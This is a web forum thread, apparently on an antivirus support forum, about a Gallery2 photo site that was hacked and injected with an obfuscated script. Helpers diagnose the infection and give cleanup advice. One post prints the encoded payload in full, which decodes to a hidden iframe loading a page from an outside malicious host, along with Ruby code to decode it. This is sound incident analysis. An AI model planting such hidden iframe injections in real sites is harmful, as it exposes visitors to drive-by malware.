Avast says my Gallery2 website is infected with a Trojan, please help!

Hi,

I have several web sites, one of them a gallery with my astronomical images. Yesterday I posted a new picture I took a few days ago and someone warned me that Avast says my site is infected with a Trojan. Then someone else reported the same, also with Avast. I use two different (nameless :slight_smile:) virus scanners on my PCs and they don’t see a problem. Clearly I want to exterminate any infections in my site but I also don’t want false positives to keep people away. Could someone from Avast please have a look? I googled the subject and searched this site but didn’t see it reported before.

This is the link: http://gallery.tungstentech.com/main.php?g2_itemId=1406

Thanks!

Generally, avast detection is accurate in these cases.
Isn’t it an encrypted/obfuscated script or iframe?
Wasnā€™t the site hacked?

I’ll take a look into its code…

Yeah, the site was hacked…
In the end of the page, there is an encrypted script…

var eMCeGjolMPJFNuucZWLk = ... ... continues.

Wow, that’s terrible. Thanks! I’ll fix it asap and have taken my site offline for now.

You also need to address why you got hacked and close the vulnerability or ‘I’ll be back.’

  • This is commonly down to old content management software being vulnerable, see this example of a HOSTs response to a hacked site.
We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains. We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts.

I suggest the following clean up procedure for both your accounts:

  1. check all index pages for any signs of java script injected into their coding. On windows servers check any “default.aspx” or
    “default.cfm” pages as those are popular targets too.

  2. Remove any “rogue” files or php scripts uploaded by the hackers into your account. Such scripts allowed them to make account wide
    changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.

  3. Check all .htaccess files, as hackers like to load re-directs into them.

  4. Change all passwords for that end user account. The cp password, the ftp password, and any ftp sub accounts. Make sure to use a
    “strong” password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!

This coupled with our server side changes should prevent any resurfacing of the hackers efforts. In some cases you may still have coding which allows for injection. All user input fields hidden or not should be hard coded, filtered, and sanitized before being handed off to php or a database which will prevent coding characters from being submitted and run through your software.

Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.

Also see forum topic, http://forum.avast.com/index.php?topic=45458.0.

Yes, naturally.

Hi SanderP,

I get this error code:

HEAVILY EDITED BY ME!^h2 Configuration Error: Missing Theme ^/h2^
^/div^
^div class="gbBl*ck"...^
^h3> Missing Theme .../h3^
 ^p class="giDescripti*n"^
This album is configured to use the ^b>carbon</b^
 theme, but it is either inactive, not installed, or incompatible.
To fix this problem you can either ^...a href="main.php?g2_view=core.UserAdmin&g2_subView=c*re.UserLogin&g2_return=%2Fmain.php%3Fg2_view%3Dcore.ShowItemError%26g2_problem%3DmissingTheme%26g2_itemId%3D1406%26"...^
login^/a> and then <a href="main.php?g2_view=core.ItemAdmin&g2_subView=c*re.ItemEdit&g2_editPlugin=ItemEditAlbum&g2_itemId=1405&g2_return=%2Fmain.php%3Fg2_view%3Dcore.ShowItemError%26g2_problem%3DmissingTheme%26g2_itemId%3D1406%26"^.................
choose a new theme for this album^/a> or <a href="main.php?g2_view=c*re.UserAdmin&g2_subView=c*re.UserLogin&...........
g2_return=%2Fmain.php%3Fg2_view%3Dcore.ShowItemError%26g2_pr*blem%3DmissingTheme%26g2_itemId%3D1406%26"^
login as a site administrat*r</a> and then <a href="main.php?g2_view=c*re.SiteAdmin&g2_subView=core.AdminPlugins&g2_mode=c*nfig&...............g2_return=%2Fmain.php%3Fg2_view%3Dcore.Sh*wItemError%26g2_problem%3DmissingTheme%26g2_itemId%3D1406%26"^
install or activate this theme^/a^

You are familiar with this, probably the loading of the redirect?

polonus

Hi,

I don’t see that error right now. I just installed the latest Gallery2 code and was able to upgrade the database. Things look good and I verified that the javascript is no longer being emitted. I’ll be taking further precautions, naturally. Do you still see it?

Thanks,

Sander

Hi SanderP,

I checked again using the bad stuff detektor, and this time I could not detect the failcode.
This is what you have to check now:
Results from 22.10 Dutch local time - European Central Time -
No zeroiframes detected!
Check took 10.05 seconds

(Level: 0) Url checked:
hxtp://gallery.tungstentech.com/main.php?g2_itemId=1406
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://gallery.tungstentech.com/main.php?g2_view=core.combinedjavascript&g2_key=5d713f3ae3d3f2c55383cb50739371e9
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://gallery.tungstentech.com/themes/carbon/theme.js
Zeroiframes detected on this site: 0
No ad codes identified

Please adapt the links you gave in your postings to make them non-clickable for the curious by nature, as I did above, using either htXp:// or wXw.

polonus

I will do that, good idea.


Here is something else to consider :

I use two different (nameless virus scanners on my PCs and they don't see a problem.

This may be why your computer does not detect this problem.


Hi CharleyO,

This could be true: if there are two resident virus scanners, they will interfere with each other and alert on each other’s signatures. A resident scanner like avast combined with a non-resident scanner like DrWebCureIt or a standalone AV scanner like McAfee’s stinger.exe etc. poses no problems.

So the mistake made here is thinking that more of the same is better; the same mistake can be made with software firewalls. It is like two dogs guarding a house: instead of guarding the house, they start to fight each other while the malcreant sneaks in.

polonus

Eh, yeah. I’m not that much of a noob you know :slight_smile: I meant two different PCs, two different virus scanners. My company uses Symantec corporate and I use something else.

Hi SanderP,

No offense meant; you will be OK as soon as you are made familiar with where you have to look on the site for the malcode infection. This can help for check-ups: http://www.blacklistdoctor.com/bld/diagnose.php
There aren’t a lot of av vendors that have set out to their users that there is a big difference between general (OS and software independent) malcode and OS and software specific malware; they are often presented and swept together for obvious reasons. But to better analyze malcode of all sorts we should consider and determine under what category it comes, also to better evaluate the vector payload. Thanks again for reporting, and for providing the malware fighter’s challenge,

polonus

I converted the jscript to ruby to see what it does. The iframe gets the source from you - found - it . org (no spaces) which thankfully is suspended according to whois. I tried to get the page with wget and it timed out. So luckily the infection has been harmless for at least a while.

Here is the ruby equivalent of the code. Naturally the puts was a document . write to add the iframe:

enc_str = "jc60jc105jc102jc114jc97jc109jc101jc32jc119jc105jc100jc116jc104jc61jc34jc52jc56jc48jc34jc32jc104jc101jc105jc103jc104jc116jc61jc34jc54jc48jc34jc32jc115jc114jc99jc61jc34jc104jc116jc116jc112jc58jc47jc47jc121jc111jc117jc45jc102jc111jc117jc110jc100jc45jc105jc116jc46jc111jc114jc103jc47jc105jc110jc100jc101jc120jc46jc112jc104jc112jc34jc32jc115jc116jc121jc108jc101jc61jc34jc98jc111jc114jc100jc101jc114jc58jc48jc112jc120jc59jc32jc112jc111jc115jc105jc116jc105jc111jc110jc58jc114jc101jc108jc97jc116jc105jc118jc101jc59jc32jc116jc111jc112jc58jc48jc112jc120jc59jc32jc108jc101jc102jc116jc58jc45jc53jc48jc48jc112jc120jc59jc32jc111jc112jc97jc99jc105jc116jc121jc58jc48jc59jc32jc102jc105jc108jc116jc101jc114jc58jc112jc114jc111jc103jc105jc100jc58jc68jc88jc73jc109jc97jc103jc101jc84jc114jc97jc110jc115jc102jc111jc114jc109jc46jc77jc105jc99jc114jc111jc115jc111jc102jc116jc46jc65jc108jc112jc104jc97jc40jc111jc112jc97jc99jc105jc116jc121jc61jc48jc41jc59jc32jc45jc109jc111jc122jc45jc111jc112jc97jc99jc105jc116jc121jc58jc48jc34jc62jc60jc47jc105jc102jc114jc97jc109jc101jc62"

# Each "jc<number>" piece is one character code. Drop the empty piece that
# split leaves in front of the leading "jc", otherwise it becomes a NUL byte.
split_enc_str = enc_str.split("jc").reject(&:empty?)
out_str = ""
split_enc_str.each do |num|
  out_str += num.to_i.chr
end

puts out_str   # in the original script this was a document.write(...)
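As an added example (not the poster's script, and not code from the original thread), here is the same "jc" decoding written as a reusable function, followed by a check of what the decoded iframe points at and which CSS tricks hide it from the visitor. The sample string is constructed for this example and uses the placeholder host example.invalid; the function names are my own.

```ruby
# Added example, not from the original post. SAMPLE is a constructed
# "jc"-encoded iframe tag; example.invalid is a placeholder host.
SAMPLE = [
  "jc60jc105jc102jc114jc97jc109jc101jc32",                    # <iframe
  "jc115jc114jc99jc61jc34",                                   # src="
  "jc104jc116jc116jc112jc58jc47jc47",                         # http://
  "jc101jc120jc97jc109jc112jc108jc101jc46jc105jc110jc118jc97jc108jc105jc100", # example.invalid
  "jc47jc120jc46jc112jc104jc112jc34jc32",                     # /x.php"
  "jc115jc116jc121jc108jc101jc61jc34",                        # style="
  "jc111jc112jc97jc99jc105jc116jc121jc58jc48jc59jc32",        # opacity:0;
  "jc108jc101jc102jc116jc58jc45jc53jc48jc48jc112jc120jc34jc62", # left:-500px">
  "jc60jc47jc105jc102jc114jc97jc109jc101jc62"                 # </iframe>
].join

# Each "jc<number>" token is one character code; anything else is ignored,
# so a leading "jc" or stray whitespace never turns into a NUL byte.
def decode_jc(enc)
  enc.scan(/jc(\d+)/).flatten.map { |n| n.to_i.chr(Encoding::UTF_8) }.join
end

# Pull the iframe's target URL out of the decoded HTML and list the CSS or
# size tricks that keep it out of sight (the injected tag in this thread
# used opacity:0, a large negative left offset and an alpha filter of 0).
def inspect_iframe(html)
  src   = html[/<iframe[^>]*\bsrc="([^"]*)"/i, 1]
  style = (html[/<iframe[^>]*\bstyle="([^"]*)"/i, 1] || "").downcase
  indicators = []
  indicators << "opacity:0"         if style =~ /opacity\s*:\s*0(?!\.)/
  indicators << "off-screen offset" if style =~ /(left|top)\s*:\s*-\d+/
  indicators << "alpha filter"      if style =~ /alpha\(opacity\s*=\s*0\)/
  indicators << "zero size"         if html =~ /<iframe[^>]*\b(width|height)="0"/i
  { src: src, hidden: !indicators.empty?, indicators: indicators }
end

if __FILE__ == $PROGRAM_NAME
  html = decode_jc(SAMPLE)
  puts html
  p inspect_iframe(html)
end
```

The iframe's src is the value to report to the host and to block or watch for in web-server and proxy logs; the hidden-style indicators are what distinguish an injected frame from a legitimate embed.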

Hi SanderP,

Also analyze with these online resources: http://www.gooby.ca/decrypt/
and consider this new malcoder’s trick: http://blog.fortinet.com/malicious-javascript-obfuscation-divide-et-impera/

Stay safe and secure online is the wish and command of,

polonus

Hi,

another one of my sites was infected as well and it seems the entire host has been taken. I installed avast! on this computer and it complained about the same trojan when I wanted to log into my control panel. Looking around the site I found an unknown directory with a php file. It’s a jumbled mess but it’s clear it tries to insert the tag adsttnmq1 in webpages. Should I upload the php somewhere for you to analyze? In this case it added a whole bunch of links to my default.aspx which is a dotnetnuke page.

PHP has been disabled on that site and the offending code was removed.

Thanks,

Sander

There is another topic where this is the same, as the hack included the host’s control panel files too. So in cases like this you should inform the host, as the control panel pages are outside of your control.

It may be that the version of PHP was old and being exploited.

Hi,

naturally I immediately let the host know that even his main site was infected. I think they’re kind of busy because I didn’t get a response yet :slight_smile: I removed all infected code from my sites and bolted down the configs as much as possible, disabling cgi-bin/php etc on my asp.net sites. That was already done on some of them but it could be improved in others.

Sander